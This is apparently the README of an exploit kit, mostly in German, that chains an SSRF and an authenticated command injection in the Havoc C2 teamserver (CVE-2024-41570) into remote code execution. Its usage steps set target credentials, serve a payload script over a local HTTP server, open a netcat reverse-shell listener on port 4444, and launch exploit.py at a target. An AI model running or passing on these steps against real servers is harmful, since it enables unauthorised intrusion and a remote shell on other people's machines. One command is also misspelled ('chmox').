
Dies ist eine verkettete RCE im Havoc C2 Framework unter Verwendung der pocs von github.com/chebuya und github.com/IncludeSecurity
Dies ist eine verkettete RCE (CVE-2024-41570) im Havoc C2-Framework.
Befehlseinschleusung: Havoc ist anfällig für Befehlseinschleusung, die es einem authentifizierten Benutzer ermöglicht, Befehle auf dem Teamserver auszuführen. Betroffen sind Versionen 0.3 bis zur neuesten Version 0.6. Das Standardprofil von Havoc enthält hartcodierte Passwörter, sodass ein C2-Betreiber, der unvorsichtig genug ist, das Standardprofil in einem öffentlichen Netzwerk zu verwenden, sofort ausgenutzt werden kann.
SSRF: Diese Schwachstelle wird ausgenutzt, indem eine Dämon-Agent-Registrierung und Checkins gefälscht werden, um einen TCP-Socket auf dem Teamserver zu öffnen und Daten von ihm zu lesen/schreiben. Dies ermöglicht Angreifern, die Ursprungs-IPs von Teamservern und vieles mehr preiszugeben.
Kette: Missbrauch von SSRF, um eine authentifizierte Befehlseinschleusungs-Payload zu liefern.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
Dank an @chebuya und @Hyperreality